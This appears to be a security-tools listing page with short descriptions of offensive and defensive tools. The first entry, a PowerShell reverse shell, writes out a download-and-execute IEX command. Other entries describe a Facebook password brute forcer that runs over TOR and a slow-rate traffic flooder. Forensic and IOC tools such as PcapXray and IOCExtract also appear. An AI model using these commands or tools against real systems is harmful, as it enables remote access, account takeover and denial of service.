ReverseTCPShell : PowerShell ReverseTCP Shell, Client & Server
ReverseTCPShell is a tool for Reverse Encrypted (AES 256-bit) Shell over TCP using PowerShell SecureString. Attacker (C2-Server Listener): PS> .ReverseTCP.ps1 Target (Client): CMD> ECHO IEX((::Unicode.GetString(::FromBase64String({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}))));Exit | PowerShell -
RIPVT : Virus Total API Maltego Transform Set For Canari
ripVT is a set of Maltego Canari transforms for the Virus Total private API. Provided AS-IS, no warranties, no guarantees. No jokes in this repo. It's as serious as you are. Installation: Requires Canari, specifically this branch/version. Install Malformity. sudo python setup.py install. canari create-profile ripVT. Import generated ripVT.mtz. Import entities stored at: src/ripVT/resources/external/entities.mtz. Copy src/ripVT/resources/etc/ripVT.conf to ~/.canari/. Pivots: Multiple unique entities enable forward & reverse searches. Unique graphically-distinguished icons.
PcapXray : Tool To Visualize A Packet Capture Offline
PcapXray is a Network Forensics Tool to visualize a Packet Capture offline as a Network Diagram, with device identification, highlighting of important communication, and file extraction. PcapXray Design Specification Goal: Given a Pcap File, plot a network diagram displaying hosts in the network, network traffic, highlight important traffic and Tor traffic as well as potential malicious traffic including data involved in the communication. Problem: Investigation...
IOCExtract : Advanced Indicator Of Compromise (IOC) Extractor
IOCExtract is an advanced Indicator of Compromise (IOC) extractor. This library extracts URLs, IP addresses, MD5/SHA hashes, email addresses, and YARA rules from text corpora. It includes some encoded and "defanged" IOCs in the output, and optionally decodes/refangs them. The Problem It is common practice for malware analysts or endpoint software to "defang" IOCs such as URLs and IP addresses, in order...
VTHunting : A Tiny Script Used to Generate Report About Virus Total Hunting
VTHunting is a tiny tool based on the VT API version 3 that runs daily, weekly or monthly reports about malware hunting. The report can be sent via email, Slack channel or Telegram. The tool can also be used from the CLI to get a report anytime. The default number of results is 10 but it can be increased or...
Facebash : Facebook Brute Forcer In Shellscript Using TOR
Facebash is a Facebook brute forcer written in shell script that uses TOR. Warning: Facebook blocks an account for 1 hour after 20 wrong passwords, so this script can perform only 20 pass/h. Features: Save/Resume sessions. Anonymous attack through TOR. Default Password List (+39k). Usage: git clone https://github.com/thelinuxchoice/facebash cd instashell chmod +x facebash.sh service...
Finshir : A Coroutines-Driven Low & Slow Traffic Sender
Finshir is a high-performance, coroutines-driven, and fully customisable implementation of a Low & Slow load generator designed for real-world pentesting. You can easily torify/proxify it using various platform-dependent utilities. Advantages: Coroutines-driven. Finshir uses coroutines (also called lightweight threads) instead of ordinary threads, which lets you open many more connections with fewer system resources. Generic. Unlike other Low & Slow utilities, Finshir lets you...
Metabigor : Command Line Search Engines Without Any API Key
Metabigor lets you query search engines (like Shodan, Censys, Fofa, etc.) from the command line without any API key. But why? Don't use your API key, so you don't have to worry about the limit of the API quota. Do queries from the command line without a Premium account. Get more results without a Premium account. But I...
AutoPwn : Automate Repetitive Tasks For Fuzzing
Completely re-writing this right now. Focus will be on interactive Linux apps that only take input from stdin for starters. Attempting to use Shellphish's Driller and Fuzzer functionality. AutoPwn in its current state will do this in limited form. Simply run autoPwn ./binary then select the Start option. Installing: Given all the dependency issues here, the easiest way to...
UserRecon-PY : Find Username In Social Networks
Userrecon-PY is a tool used to find usernames in social networks. Installation Install dependencies (Debian/Ubuntu): sudo apt install python3 python3-pip Install with pip3: sudo -H pip3 install git+https://github.com/decoxviii/userrecon-py.git userrecon-py --help Building from Source Clone this repository, and: git clone https://github.com/decoxviii/userrecon-py.git ; cd userrecon-py sudo -H pip3 install -r requirements.txt python3 setup.py build sudo python3...